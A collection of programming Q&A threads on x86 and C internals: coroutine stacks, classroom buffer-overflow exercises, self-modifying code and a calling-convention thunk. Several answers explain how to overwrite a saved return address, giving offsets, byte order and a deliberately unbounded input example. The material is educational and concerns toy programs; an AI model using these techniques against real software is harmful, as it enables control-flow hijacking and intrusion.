I'm doing an exercise for an Operating Systems class and getting a segfault when calling printf with arguments.
The objective of the exercise is to simulate the initialization of a thread and print a counter, which should not be very difficult. I have a table of 4 entries, each 4096 bytes in size; each entry represents one thread's stack:
#define STACK_SIZE 4096
char table[4][STACK_SIZE];
I defined a type called coroutine_t that holds only a stack address:
typedef void* coroutine_t;
Then I have the initialization code. It must take the end of the coroutine's stack, push the coroutine's entry address and the initial register values, and return the pointer that will be the coroutine's stack pointer.
coroutine_t init_coroutine(void *stack_begin, unsigned int stack_size,
void (*initial_pc)(void)) {
char *stack_end = ((char *)stack_begin) + stack_size;
void **ptr = (void**) stack_end;
ptr--;
*ptr = initial_pc;
ptr--;
*ptr = stack_end; /* Frame pointer */
ptr--;
*ptr = 0; /* RBX*/
ptr--;
*ptr = 0; /* R12 */
ptr--;
*ptr = 0; /* R13 */
ptr--;
*ptr = 0; /* R14 */
ptr--;
*ptr = 0; /* R15 */
return ptr;
}
Then I have this x86-64 assembly to enter the coroutine, which just pops the registers previously pushed:
.global enter_coroutine /* Makes enter_coroutine visible to the linker*/
enter_coroutine:
mov %rdi,%rsp /* RDI contains the argument to enter_coroutine. */
/* And is copied to RSP. */
pop %r15
pop %r14
pop %r13
pop %r12
pop %rbx
pop %rbp
ret /* Pop the program counter */
The rest of my code is this
coroutine_t cr;
void test_function() {
int counter = 0;
while(1) {
printf("counter1: %d\n", counter);
counter++;
}
}
int main() {
cr = init_coroutine(table[0], STACK_SIZE, &test_function);
enter_coroutine(cr);
return 0;
}
So, for the error:
If I run it as is, I get a segfault when the program calls printf. The output from gdb is:
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7dfcfdd in __vfprintf_internal (s=0x7ffff7f9d760 <_IO_2_1_stdout_>, format=0x555555556004 "counter1: %d\n", ap=ap@entry=0x555555558f48 <table+3848>, mode_flags=mode_flags@entry=0) at vfprintf-internal.c:1385
I assume something is going wrong with the stack, for two reasons:
If I just print a string without parameters, I get no error.
If I remove the first ptr-- statement from the init_coroutine function, it also works, but then things are placed past the end of the stack and hence in the next thread's stack.
I'm running this on an Intel(R) Core(TM) i5-5200U CPU with Ubuntu 21.10 and gcc version 11.2.0.
Could you shed some light on this?
I wasn't able to reproduce the problem on my x86_64 Linux box, but I was able to on Compiler Explorer, and the problem seems to be a simple stack overflow (i.e., 4096 bytes is too small a stack for printf).
Increasing the stack size (or choosing table[1], table[2], or table[3] instead of table[0], which is effectively the same as increasing the stack size, since the stack grows downward into the entries below it) appears to make it work: https://gcc.godbolt.org/z/rnfMThbjo
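For what it's worth, here is a minimal sketch of the same setup with a larger stack, so the initial frame can be inspected without the assembly part. The 64 KiB figure and the helpers `initial_frame_bytes` and `dummy_entry` are assumptions made for illustration; they are not from the question or from the godbolt link.

```c
#include <assert.h>
#include <stddef.h>

#define STACK_SIZE (64 * 1024) /* assumption: 64 KiB per coroutine instead of 4096 */

typedef void *coroutine_t;

char table[4][STACK_SIZE];

/* Same frame layout as the question: entry address, RBP, RBX, R12..R15. */
coroutine_t init_coroutine(void *stack_begin, unsigned int stack_size,
                           void (*initial_pc)(void)) {
    char *stack_end = (char *)stack_begin + stack_size;
    void **ptr = (void **)stack_end;
    *--ptr = (void *)initial_pc; /* popped by ret */
    *--ptr = stack_end;          /* popped into RBP */
    for (int i = 0; i < 5; i++) {
        *--ptr = 0;              /* popped into RBX, R12, R13, R14, R15 */
    }
    return ptr;
}

/* Hypothetical helper: bytes of the stack already used by the initial frame. */
size_t initial_frame_bytes(coroutine_t sp, void *stack_begin,
                           unsigned int stack_size) {
    char *stack_end = (char *)stack_begin + stack_size;
    assert((char *)sp >= (char *)stack_begin && (char *)sp <= stack_end);
    return (size_t)(stack_end - (char *)sp);
}

/* Hypothetical entry point, only used to have an address to store. */
void dummy_entry(void) {}
```

With this layout the initial frame takes 7 pointer-sized slots, and whatever printf needs has to fit in the space left below it.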
I am trying to learn more about buffer overflows so I have created a simple program to gain knowledge and try to exploit it.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void failed(void)
{
puts("Did not exploit");
exit(0);
}
void pass(void)
{
puts("Good Job");
exit(1);
}
void foo()
{
char input[4];
gets(input);
}
int _main()
{
foo();
failed();
return 0;
}
I am trying to fill the buffer within foo() with random characters followed by the address of pass(), so that the return address of foo() gets overwritten with the starting address of pass(). I used the following GDB commands to get the relevant information:
x foo
-> 0x8049dd7 foo : 0xfb1e0ff3
disas foo
Dump of assembler code for function foo:
0x08049e09 <+0>: endbr32
0x08049e0d <+4>: push %ebp
0x08049e0e <+5>: mov %esp,%ebp
0x08049e10 <+7>: push %ebx
0x08049e11 <+8>: sub $0x14,%esp
0x08049e14 <+11>: call 0x8049e5a <__x86.get_pc_thunk.ax>
0x08049e19 <+16>: add $0x9b1e7,%eax
0x08049e1e <+21>: sub $0xc,%esp
0x08049e21 <+24>: lea -0xc(%ebp),%edx
0x08049e24 <+27>: push %edx
0x08049e25 <+28>: mov %eax,%ebx
0x08049e27 <+30>: call 0x8058850 <gets>
0x08049e2c <+35>: add $0x10,%esp
0x08049e2f <+38>: nop
0x08049e30 <+39>: mov -0x4(%ebp),%ebx
0x08049e33 <+42>: leave
0x08049e34 <+43>: ret
End of assembler dump.
I then created a Python program that feeds its output into my vulnerable.c program; it simply prints
print('A'*15 + '\x08\x04\x9d\xd7')
The 'A'*15 is supposed to fill the buffer and the saved EBP, and the bytes after it are supposed to overwrite the return address with the address found above (\x08\x04\x9d\xd7), but I keep getting segmentation faults. Any assistance would be great!
Any mistake and the attempt will segfault. You must:
have the right target address
put it in the right place on the stack
use the right byte order
The first one is difficult because the kernel will randomize address spaces on load,
primarily because of these kinds of attacks.
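The other two you've gotten wrong. The disassembly shows the buffer at -0xc(%ebp), so the return address starts 16 bytes past the start of the buffer (12 bytes up to the saved EBP plus 4 for the saved EBP itself), not 15. And x86 is little-endian, so the address bytes must be written least significant byte first (\xd7\x9d\x04\x08).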
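As a rough sketch of the placement and byte-order points, the payload could be assembled like this. `build_payload` is a hypothetical helper; the padding of 16 and the address 0x08049dd7 are read off the question's gdb output and only hold for that particular binary, assuming it is loaded at the same address every time.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper: writes `padding` filler bytes followed by `target`
 * as a 4-byte little-endian address. Returns the payload length, or 0 if
 * the output buffer is too small.
 */
size_t build_payload(unsigned char *out, size_t out_size,
                     size_t padding, uint32_t target) {
    assert(out != NULL);
    if (out_size < padding + 4) {
        return 0;
    }
    memset(out, 'A', padding);
    for (int i = 0; i < 4; i++) {
        /* least significant byte first, as x86 expects */
        out[padding + i] = (unsigned char)(target >> (8 * i));
    }
    return padding + 4;
}
```

For the binary in the question that would be build_payload(buf, sizeof buf, 16, 0x08049dd7), followed by a newline so gets() returns.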
If you'd like to play with something similar, here's an example
that changes the return address. Because of C calling conventions,
the stack is corrupted at the end of main, which can be fixed by using
stdcall or pascal calling conventions for the test function.
Syntax for that is compiler dependent.
#include <stdio.h>
#include <stdlib.h>
void oops() {
printf("oops!\n");
}
void /*__stdcall*/ test(int t)
{
/* x86 stack is top down, int is same size as pointer */
int *return_is_at = &t - 1;
/* replace parameter with our return address, for oops to return to */
*(&t) = *return_is_at; /* just-in-case avoid optimization*/
/* replace our return address with address of oops */
*return_is_at = (int)oops;
}
int main(int argc, char **argv)
{
test(1);
printf("test returned\n");
/* unless stdcall, at this point our stack is corrupted
and this return will crash, so:
*/
exit(1);
}
Here's an alternative function that uses a local variable to calculate
the return address location instead of the parameter.
This assumes a standard stack frame, which the compiler may optimize away.
It also corrupts the stack.
void test2()
{
/* x86 stack is top down, int is same size as pointer */
/* this relies on consistently defined stack frames */
int l;
int *return_is_at = &l + 2;
/* copy our return address up one,
for oops to return to (corrupting the stack)
*/
return_is_at[1] = *return_is_at;
/* replace our return address with address of oops */
*return_is_at = (int)oops;
}
FYI - It's possible to use a similar technique to track unique call trees for a function
(by walking up the stack frames) in order to fail specific call instances during testing.
I am trying to do a buffer overflow for my security class. We are not allowed to call any function, and we need to jump to the secret function and also return 0 without a segmentation fault. I wrote the code below and successfully jumped to secret, but I am getting a segmentation fault. How can I terminate the program successfully? Also, is it possible to write to a single address instead of using a for loop? When I tried that, it did not change anything.
#include <stdio.h>
void secret()
{
printf("now inside secret()!\n");
}
void entrance()
{
int doNotTouch[10];
// can only modify this section BEGIN
// cant call secret(), maybe use secret (pointer to function)
for (int i = 0; i < 14; i++) {
*(doNotTouch + i) = (int) &secret;
}
// can only modify this section END
printf("now inside entrance()!\n");
}
int main (int argc, char *argv[])
{
entrance();
return 0;
}
In some semi-assembler, assuming some kind of x86. (BP is pseudocode for EBP or RBP, assuming you're not actually compiling for 16-bit mode. 32-bit mode is likely so int is the same width as a return address.)
; entrance:
; - stack has return address to main
push bp ; decrement SP by a pointer width
mov bp,sp
sub sp, 10*sizeof(int) ; reserve space for an array
;....
; doNotTouch[0] is probably at [bp - 10*sizeof(int)]
When you loop to 14, you first overwrite the saved bp at i==10 and then the return address to main (which is correct) and then overwrite some more which eventually causes the seg fault. So you only need to do *(doNotTouch + 11) = (int) &secret; - assuming int is the size of a function pointer. (Or a bit more if the compiler left a gap for stack-alignment or its own use. In a debug build other locals will have stack slots. Overwriting them could lead to an infinite loop that goes out of bounds.)
Then follows your printf and then the function returns, but it does not return to main but "jumps" to secret.
When secret returns, it is actually now the return from main but it couldn't do the return 0;
So secret should be:
int secret()
{
printf("now inside secret()!\n");
return 0;
}
Disclaimer: "....I think."
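The index arithmetic in this answer can be written down as a small sketch. `return_slot_index` is a hypothetical helper, and it assumes the saved frame pointer sits directly above the array with no padding or other locals in between, which a real compiler does not guarantee.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Hypothetical helper: index (in array elements) of the return-address slot,
 * counted from the start of a local array. Assumes the layout
 *   [array][saved frame pointer][return address]
 * with no padding between the parts.
 */
size_t return_slot_index(size_t n_elems, size_t elem_size, size_t word_size) {
    assert(elem_size != 0 && word_size % elem_size == 0);
    /* skip the array itself, then one machine word for the saved frame pointer */
    return n_elems + word_size / elem_size;
}
```

For int doNotTouch[10] in 32-bit code this gives index 11, matching the single assignment suggested above; checking the real layout in a debugger is still the safer route.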
A lot of related questions <How is x86 instruction cache synchronized? > mention that x86 should properly handle i-cache synchronization in self-modifying code. I wrote the following piece of code, which toggles a function call on and off from different threads, interleaved with its execution. I am using a compare-and-swap operation as an additional guard so that the modification is atomic. But I am getting intermittent crashes (SIGSEGV, SIGILL), and analyzing the core dump makes me suspect that the processor is trying to execute partially updated instructions. The code and the analysis are given below. Maybe I am missing something here. Let me know if that's the case.
toggle.c
#include <stdio.h>
#include <inttypes.h>
#include <time.h>
#include <pthread.h>
#include <sys/mman.h>
#include <errno.h>
#include <unistd.h>
int active = 1; // Whether the function is toggled on or off
uint8_t* funcAddr = 0; // Address where function call happens which we need to toggle on/off
uint64_t activeSequence = 0; // Byte sequence for toggling on the function CALL
uint64_t deactiveSequence = 0; // NOP byte sequence for toggling off the function CALL
inline int modify_page_permissions(uint8_t* addr) {
long page_size = sysconf(_SC_PAGESIZE);
int code = mprotect((void*)(addr - (((uint64_t)addr)%page_size)), page_size,
PROT_READ | PROT_WRITE | PROT_EXEC);
if (code) {
fprintf(stderr, "mprotect was not successful! code %d\n", code);
fprintf(stderr, "errno value is : %d\n", errno);
return 0;
}
// If the 8 bytes we need to modify straddles a page boundary make the next page writable too
if (page_size - ((uint64_t)addr)%page_size < 8) {
code = mprotect((void*)(addr-((uint64_t)addr)%page_size+ page_size) , page_size,
PROT_READ | PROT_WRITE | PROT_EXEC);
if (code) {
fprintf(stderr, "mprotect was not successful! code %d\n", code);
fprintf(stderr, "errno value is : %d\n", errno);
return 0;
}
}
return 1;
}
void* add_call(void* param) {
struct timespec ts;
ts.tv_sec = 0;
ts.tv_nsec = 50000;
while (1) {
if (!active) {
if (activeSequence != 0) {
int status = modify_page_permissions(funcAddr);
if (!status) {
return 0;
}
uint8_t* start_addr = funcAddr - 8;
fprintf(stderr, "Activating foo..\n");
uint64_t res = __sync_val_compare_and_swap((uint64_t*) start_addr,
*((uint64_t*)start_addr), activeSequence);
active = 1;
} else {
fprintf(stderr, "Active sequence not initialized..\n");
}
}
nanosleep(&ts, NULL);
}
}
int remove_call(uint8_t* addr) {
if (active) {
// Remove gets called first before add so we initialize active and deactive state byte sequences during the first call the remove
if (deactiveSequence == 0) {
uint64_t sequence = *((uint64_t*)(addr-8));
uint64_t mask = 0x0000000000FFFFFF;
uint64_t deactive = (uint64_t) (sequence & mask);
mask = 0x9090909090000000; // We NOP 5 bytes of CALL instruction and leave rest of the 3 bytes as it is
activeSequence = sequence;
deactiveSequence = deactive | mask;
funcAddr = addr;
}
int status = modify_page_permissions(addr);
if (!status) {
return -1;
}
uint8_t* start_addr = addr - 8;
fprintf(stderr, "Deactivating foo..\n");
uint64_t res = __sync_val_compare_and_swap((uint64_t*)start_addr,
*((uint64_t*)start_addr), deactiveSequence);
active = 0;
// fprintf(stderr, "Result : %p\n", res);
}
return 0; // Nothing failed (the function is declared to return int)
}
int counter = 0;
void foo(int i) {
// Use the return address to determine where we need to patch foo CALL instruction (5 bytes)
uint64_t* addr = (uint64_t*)__builtin_extract_return_addr(__builtin_return_address(0));
fprintf(stderr, "Foo counter : %d\n", counter++);
remove_call((uint8_t*)addr);
}
// This thread periodically checks if the method is inactive and if so reactivates it
void spawn_add_call_thread() {
pthread_t tid;
pthread_create(&tid, NULL, add_call, (void*)NULL);
}
int main() {
spawn_add_call_thread();
int i=0;
for (i=0; i<1000000; i++) {
// fprintf(stderr, "i : %d..\n", i);
foo(i);
}
fprintf(stderr, "Final count : %d..\n\n\n", counter);
}
Core dump analysis
Program terminated with signal 4, Illegal instruction.
#0 0x0000000000400a28 in main () at toggle.c:123
(gdb) info frame
Stack level 0, frame at 0x7fff7c8ee360:
rip = 0x400a28 in main (toggle.c:123); saved rip 0x310521ed5d
source language c.
Arglist at 0x7fff7c8ee350, args:
Locals at 0x7fff7c8ee350, Previous frame's sp is 0x7fff7c8ee360
Saved registers:
rbp at 0x7fff7c8ee350, rip at 0x7fff7c8ee358
(gdb) disas /r 0x400a28,+30
Dump of assembler code from 0x400a28 to 0x400a46:
=> 0x0000000000400a28 <main+64>: ff (bad)
0x0000000000400a29 <main+65>: ff (bad)
0x0000000000400a2a <main+66>: ff eb ljmpq *<internal disassembler error>
0x0000000000400a2c <main+68>: e7 48 out %eax,$0x48
(gdb) disas /r main
Dump of assembler code for function main:
0x00000000004009e8 <+0>: 55 push %rbp
...
0x0000000000400a24 <+60>: 89 c7 mov %eax,%edi
0x0000000000400a26 <+62>: e8 11 ff ff ff callq 0x40093c <foo>
0x0000000000400a2b <+67>: eb e7 jmp 0x400a14 <main+44>
So, as can be seen, the instruction pointer seems to be positioned at an address inside the CALL instruction, and the processor is apparently trying to execute that misaligned instruction, causing an illegal instruction fault.
I think your problem is that you replaced a 5-byte CALL instruction with 5 1-byte NOPs. Consider what happens when your thread has executed 3 of the NOPs, and then your master thread decides to swap the CALL instruction back in. Your thread's PC will be three bytes in the middle of the CALL instruction and will therefore execute an unexpected and likely illegal instruction.
What you need to do is swap the 5-byte CALL instruction with a 5-byte NOP. You just need to find a multibyte instruction that does nothing (such as or'ing a register against itself) and if you need some extra bytes, prepend some prefix bytes such as a gs override prefix and an address-size override prefix (both of which will do nothing). By using a 5-byte NOP, your thread will be guaranteed to either be at the CALL instruction or past the CALL instruction, but never inside of it.
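As a sketch of that idea, the "deactive" sequence could be built from the commonly recommended 5-byte NOP encoding (0F 1F 44 00 00) instead of five 0x90 bytes. `make_deactive_sequence` is a hypothetical helper, and it assumes, like the question's code, that the 8 bytes passed in end exactly at the return address, so the CALL occupies the last 5 of them. It only covers the "never land inside the instruction" point and does not by itself make cross-thread patching safe.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* One 5-byte NOP: nopl 0x0(%rax,%rax,1) */
static const uint8_t NOP5[5] = {0x0F, 0x1F, 0x44, 0x00, 0x00};

/*
 * Hypothetical helper: takes the 8 bytes that end at the return address
 * (3 unrelated bytes followed by the 5-byte CALL) and returns the same
 * 8 bytes with the CALL replaced by a single 5-byte NOP.
 */
uint64_t make_deactive_sequence(uint64_t active_sequence) {
    uint8_t bytes[8];
    uint64_t patched;

    memcpy(bytes, &active_sequence, sizeof bytes);
    assert(bytes[3] == 0xE8); /* expects a CALL rel32 in the last 5 bytes */
    memcpy(bytes + 3, NOP5, sizeof NOP5);
    memcpy(&patched, bytes, sizeof patched);
    return patched;
}
```

Working on a byte array keeps the helper independent of how the compiler lays out the 64-bit constant, which is easy to get backwards with hand-written masks.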
On 80x86 most calls use a relative displacement, not an absolute address. Essentially it's "call the code at here + < displacement >" and not "call the code at < address >".
For 64-bit code, a direct near call is 5 bytes long: the E8 opcode followed by a 32-bit displacement. The displacement is never 64 bits.
So when you overwrite the 8 bytes that end at the return address, you'd be trashing 3 bytes before the call instruction, the call opcode itself, and the instruction's operand (the displacement).
However...
These aren't the only way to call. For example, you can call using a function pointer, where the address of the code being called is not in the instruction at all (but may be in a register or be a variable in memory). There's also an optimisation called "tail call optimisation" where a call followed by a ret is replaced with a jmp (likely with some additional stack diddling for passing parameters, cleaning up the caller's local variables, etc).
Essentially; your code is severely broken, you can't cover all the possible corner cases, you shouldn't be doing this to begin with, and you probably should be using a function pointer instead of self modifying code (which would be faster and easier and portable too).
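A minimal sketch of the function-pointer alternative, using C11 atomics so the toggle can happen from another thread. All names here (`foo_impl`, `set_foo_active`, `call_foo`, `foo_count`) are made up for illustration and are not from the question.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>

typedef void (*foo_fn)(int);

static atomic_int counter;

/* The "on" version does the real work; the "off" version does nothing. */
static void foo_active(int i)   { (void)i; atomic_fetch_add(&counter, 1); }
static void foo_inactive(int i) { (void)i; }

/* The call site goes through this pointer instead of being patched. */
static _Atomic(foo_fn) foo_impl = foo_active;

/* May be called from any thread to toggle the call on or off. */
void set_foo_active(int on) {
    atomic_store(&foo_impl, on ? foo_active : foo_inactive);
}

/* What the loop in main would call instead of foo(i). */
void call_foo(int i) {
    foo_fn f = atomic_load(&foo_impl);
    assert(f != NULL);
    f(i);
}

int foo_count(void) {
    return atomic_load(&counter);
}
```

Every call sees either the old or the new pointer value, so there is no window in which a half-updated instruction can be executed.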
I want to skip a line in C, the line x=1; in the main section, using a buffer overflow. However, I don't know why I cannot skip from address 4002f4 to the next address, 4002fb, even though I am counting 7 bytes from <main+35> to <main+42>.
I have also configured the randomization and execstack options in a Debian and AMD environment, but I am still getting x=1;. What is wrong with this procedure?
I have used dba to debug the stack and the memory addresses:
0x00000000004002ef <main+30>: callq 0x4002a4 <function>
0x00000000004002f4 <main+35>: movl $0x1,-0x4(%rbp)
0x00000000004002fb <main+42>: mov -0x4(%rbp),%esi
0x00000000004002fe <main+45>: mov $0x4629c4,%edi
void function(int a, int b, int c)
{
char buffer[5];
int *ret;
ret = buffer + 12;
(*ret) += 8;
}
int main()
{
int x = 0;
function(1, 2, 3);
x = 1;
printf("x = %i \n", x);
return 0;
}
You must be reading the Smashing the Stack for Fun and Profit article. I was reading the same article and ran into the same problem: it wasn't skipping that instruction. After a few hours of debugging in IDA, I changed the code as shown below, and it prints x=0 and b=5.
#include <stdio.h>
void function(int a, int b) {
int c=0;
int* pointer;
pointer =&c+2;
(*pointer)+=8;
}
void main() {
int x =0;
function(1,2);
x = 3;
int b =5;
printf("x=%d\n, b=%d\n",x,b);
getch();
}
In order to alter the return address within function() to skip over the x = 1 in main(), you need two pieces of information.
1. The location of the return address in the stack frame.
I used gdb to determine this value. I set a breakpoint at function() (break function), execute the code up to the breakpoint (run), retrieve the location in memory of the current stack frame (p $rbp or info reg), and then retrieve the location in memory of buffer (p &buffer). Using the retrieved values, the location of the return address can be determined.
(compiled w/ GCC -g flag to include debug symbols and executed in a 64-bit environment)
(gdb) break function
...
(gdb) run
...
(gdb) p $rbp
$1 = (void *) 0x7fffffffe270
(gdb) p &buffer
$2 = (char (*)[5]) 0x7fffffffe260
(gdb) quit
(frame pointer address + size of word) - buffer address = number of bytes from local buffer variable to return address
(0x7fffffffe270 + 8) - 0x7fffffffe260 = 24
If you are having difficulties understanding how the call stack works, reading the call stack and function prologue Wikipedia articles may help. This shows the difficulty in making "buffer overflow" examples in C. The offset of 24 from buffer assumes a certain padding style and compile options. GCC will happily insert stack canaries nowadays unless you tell it not to.
2. The number of bytes to add to the return address to skip over x = 1.
In your case the saved instruction pointer will point to 0x00000000004002f4 (<main+35>), the first instruction after function returns. To skip the assignment you need to make the saved instruction pointer point to 0x00000000004002fb (<main+42>).
Your calculation that this is 7 bytes is correct (0x4002fb - 0x4002f4 = 7).
I used gdb to disassemble the application (disas main) and verified the calculation for my case as well. This value is best resolved manually by inspecting the disassembly.
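Both numbers can be double-checked with plain arithmetic. The sketch below uses hypothetical helper names and simply plugs in the addresses printed by gdb in this answer and the disassembly from the question; on another build the inputs will differ.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper: distance in bytes from the start of a local buffer
 * to the saved return address, assuming the return address sits one
 * machine word above the saved frame pointer.
 */
uint64_t offset_to_return_address(uint64_t frame_pointer, uint64_t buffer_addr,
                                  uint64_t word_size) {
    assert(frame_pointer + word_size >= buffer_addr);
    return (frame_pointer + word_size) - buffer_addr;
}

/* Hypothetical helper: how much to add to the saved return address. */
uint64_t bytes_to_skip(uint64_t original_target, uint64_t desired_target) {
    assert(desired_target >= original_target);
    return desired_target - original_target;
}
```

Here offset_to_return_address(0x7fffffffe270, 0x7fffffffe260, 8) gives 24 and bytes_to_skip(0x4002f4, 0x4002fb) gives 7, the two constants used in the code below.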
Note that I used an Ubuntu 10.10 64-bit environment to test the following code.
#include <stdio.h>
void function(int a, int b, int c)
{
char buffer[5];
int *ret;
ret = (int *)(buffer + 24);
(*ret) += 7;
}
int main()
{
int x = 0;
function(1, 2, 3);
x = 1;
printf("x = %i \n", x);
return 0;
}
output
x = 0
This is really just altering the return address of function() rather than an actual buffer overflow. In an actual buffer overflow, you would be overflowing buffer[5] to overwrite the return address. However, most modern implementations use techniques such as stack canaries to protect against this.
What you're doing here doesn't seem to have much to do with a classic buffer overflow attack. The whole idea of a buffer overflow attack is to modify the return address of 'function'. Disassembling your program will show you where the ret instruction (assuming x86) takes its address from. This is what you need to modify to point at main+42.
I assume you want to explicitly provoke the buffer overflow here; normally you'd need to provoke it by manipulating the inputs of 'function'.
By just declaring a buffer[5] you're moving the stack pointer in the wrong direction (verify this by looking at the generated assembly); the return address is somewhere deeper in the stack (it was put there by the call instruction). On x86, stacks grow downwards, that is, towards lower addresses.
I'd approach this by declaring an int* and moving it upward until I'm at the address where the return address has been pushed, then modify that value to point at main+42 and let function ret.
You can't do that this way.
Here's a classic buffer overflow code sample. See what happens when you feed it 5 and then 6 characters from your keyboard. If you go for more (16 chars should do), you'll overwrite the base pointer, then the function's return address, and you'll get a segmentation fault. What you want to do is figure out which 4 chars overwrite the return address and make the program execute your code. Search for material on the Linux stack and memory layout.
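#include <stdio.h>
void ff(){
int a=0; char b[5];
scanf("%s",b); /* deliberately unbounded: this is the overflow */
printf("b:%p a:%p\n", (void *)b, (void *)&a); /* %p is the specifier for pointers */
printf("b:'%s' a:%d\n" ,b ,a);
}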
int main() {
ff();
return 0;
}
void foo(int a)
{ printf ("In foo, a = %d\n", a); }
unsigned char code[9];
* ((DWORD *) &code[0]) = 0x042444FF; /* inc dword ptr [esp+4] */
code[4] = 0xe9; /* JMP */
* ((DWORD *) &code[5]) = (DWORD) &foo - (DWORD) &code[0] - 9;
void (*pf)(int/* a*/) = (void (*)(int)) &code[0];
pf (6);
Does anyone know where in the above code 6 is incremented by 1?
foo(), as well as your thunk, uses the __cdecl calling convention, which requires the caller to push parameters on the stack. So when pf(6) is called, 6 gets pushed onto the stack via a PUSH 6 instruction, and then the thunk is entered via a CALL pf instruction. The memory that 6 occupies on the stack is located at ESP+4 when the thunk is entered, i.e. 4 bytes above the current value of the stack pointer register ESP (the return address pushed by CALL is at ESP itself). The first instruction of the thunk increments the value at ESP+4, so the value 6 becomes 7. foo() is then entered by the thunk's JMP foo instruction. foo() then sees its a parameter as 7 instead of the original 6 because the thunk modified the argument on the stack before foo() ran.
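To make the byte layout of the thunk easier to see, here is a sketch that only assembles the 9 bytes and does not execute them. `build_thunk` and its explicit 32-bit address parameters are hypothetical, introduced so the arithmetic can be checked on any machine; the question's code uses the real addresses of code and foo in a 32-bit process.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { THUNK_SIZE = 9 };

/*
 * Hypothetical helper: fills `code` with
 *   FF 44 24 04     inc dword ptr [esp+4]   (bump the first stack argument)
 *   E9 <rel32>      jmp target
 * where rel32 is relative to the end of the thunk (code_addr + 9).
 */
void build_thunk(uint8_t code[THUNK_SIZE], uint32_t code_addr,
                 uint32_t target_addr) {
    static const uint8_t inc_arg[4] = {0xFF, 0x44, 0x24, 0x04};
    uint32_t rel;

    assert(code != NULL);
    memcpy(code, inc_arg, sizeof inc_arg);
    code[4] = 0xE9;
    rel = target_addr - (code_addr + THUNK_SIZE);
    for (int i = 0; i < 4; i++) {
        code[5 + i] = (uint8_t)(rel >> (8 * i)); /* little-endian rel32 */
    }
}
```

The first four bytes are the same ones the question stores as the DWORD 0x042444FF, just written in memory order.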